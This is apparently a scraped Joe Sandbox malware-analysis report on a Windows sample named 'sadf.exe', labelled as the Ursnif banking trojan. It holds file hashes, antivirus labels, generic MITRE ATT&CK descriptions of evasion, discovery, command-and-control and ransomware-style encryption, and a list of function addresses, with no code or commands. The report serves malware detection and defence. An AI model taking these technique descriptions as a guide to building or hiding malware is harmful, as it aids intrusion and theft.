Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: f77775088410db8daf921ed3d060f625d18f6a85d0e818b1e814341ee0bdc4c4
Instruction ID: 0f53bc98fb32e28b2eb70df0ef7c7eda1b02666650382c10f1933b21fda823be
Opcode Fuzzy Hash: f77775088410db8daf921ed3d060f625d18f6a85d0e818b1e814341ee0bdc4c4
Instruction Fuzzy Hash: ABE06D33501A24A787115BA8AC4CC6BBABDFE89750304045AF600D3220C73588118BA1

Uniqueness

Uniqueness Score: -1.00%

Source: 0.0.sadf.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.sadf.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sadf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
sadf.exe

Function 00401493 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Function 008C47E5 Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Function 00401A49 Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 008C54EC Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 008C737C Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 00401D95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 0040134F Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 00401F78 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 008C3643 Relevance: 37.7, APIs: 25, Instructions: 222
memorystringCOMMON

Function 008C7B59 Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Function 008C7F95 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 008C517A Relevance: 16.7, APIs: 11, Instructions: 151
timememoryCOMMON

Function 008C60A1 Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 008C70E7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Function 008C578B Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 008C2281 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Function 00401B39 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 008C2C73 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 008C10AD Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Function 008C3EE9 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 0040182F Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Function 008C2CEC Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Function 008C3D80 Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Function 008C61FE Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 00401E3D Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 008C4076 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Function 008C4BD5 Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 004011F6 Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Function 008C3969 Relevance: 3.0, APIs: 2, Instructions: 50
memorytimeCOMMON

Function 008C3DE0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 008C72C0 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Function 008C5BB5 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 00401329 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 0040181A Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 0040147E Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 008C789E Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00401875 Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 008C3A53 Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Function 008C44D8 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Function 008C2792 Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Function 008C7256 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON